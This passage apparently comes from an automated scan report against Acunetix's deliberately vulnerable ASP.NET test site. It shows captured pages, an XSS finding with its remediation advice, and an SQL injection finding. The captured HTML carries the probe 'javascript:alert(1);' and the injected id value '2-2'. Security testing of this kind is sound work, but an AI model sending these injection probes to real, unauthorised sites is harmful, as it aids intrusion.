luZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFFGphdmFzY3JpcHQ6YWxlcnQoMSk7ZGQzvo47hQg5wK0PpdlFgvCFi0HdJQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLC0a+LDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEvarezt37OrY/7J60eqyl31VSFB" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="javascript:alert(1);" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	4
Solution	Phase: Architecture and Design Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket. Phases: Implementation; Architecture and Design Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed. Phase: Architecture and Design For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. Phase: Implementation For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping. To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue." Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
Reference	http://projects.webappsec.org/Cross-Site-Scripting http://cwe.mitre.org/data/definitions/79.html
Tags	OWASP_2021_A03 WSTG-v42-INPV-01 OWASP_2017_A07
CWE Id	79
WASC Id	8
Plugin Id	40012

High	SQL Injection
Description	SQL injection may be possible

URL	http://testaspnet.vulnweb.com/Comments.aspx?id=2-2
Method	GET
Parameter	id
Attack	2-2
Evidence
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=2-2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:44:01 GMT Content-Length: 58193
Response Body - size: 58,193 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=2-2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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